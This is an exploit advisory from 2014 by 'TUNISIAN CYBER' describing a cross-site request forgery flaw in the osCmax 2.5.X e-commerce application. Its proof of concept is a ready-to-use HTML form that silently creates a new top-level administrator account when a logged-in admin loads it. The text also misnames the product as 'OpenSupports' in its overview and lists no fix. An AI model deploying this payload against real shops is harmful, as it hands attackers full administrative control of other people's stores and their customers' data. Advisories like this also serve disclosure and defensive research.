[+] Author: TUNISIAN CYBER
[+] Exploit Title: osCmax 2.5.X Cross-Site Request Forgery (Add Admin) Vulnerability
[+]
Date
: 15-03-2014
[+] Category: WebApp
[+] Version: 2.5.X
[+] Tested on: KaliLinux/Windows 7 Pro
[+] CWE: CWE-302
[+] Vendor: http:
//www.oscmax.com/
[+] Friendly Sites: na3il.com,th3-creative.com
[+] Twitter: @TCYB3R
1.OVERVIEW:
OpenSupports v2.x suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability.
2.Version:
2.5.X
3.Background:
osCmax is a powerful e-commerce/shopping cart web application.
osCmax has all the features needed to run a successful internet store
and
can be customized to whatever configuration you need.
http:
//www.oscmax.com/what_is_oscmax_0
4.Proof Of Concept:
<html>
<form method=
"post"
name=
"newmember"
action=
"http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1"
>
<input type=
"hidden"
name=
"admin_username"
value=
"THETUNISIAN"
/>
<input type=
"hidden"
name=
"admin_firstname"
value=
"Moot3x"
/>
<input type=
"hidden"
name=
"admin_lastname"
value=
"Saad3x"
/>
<input type=
"hidden"
name=
"admin_email_address"
value=
"g4k@hotmail.esxxx"
/>
<input type=
"hidden"
name=
"admin_groups_id"
value=
"1"
/>
<!-- About
"admin_groups_id"
-->
<!-- 1= Top Administrator -->
<!-- 2= Customer Service -->
<input type=
'submit'
name=
'Submit4'
value=
"Agregar"
>
</form>
</html>
5.Solution(s):
no contact from vendor
6.TIME-LINE:
2014-15-03: Vulnerability was discovered.
2014-15-03: Contact with vendor.
2014-16-03: No reply.
2014-17-03: No reply.
2014-17-03: Vulnerability Published
7.Greetings:
Xmax-tn
Xtech-set
N43il
Sec4ver,E4A Members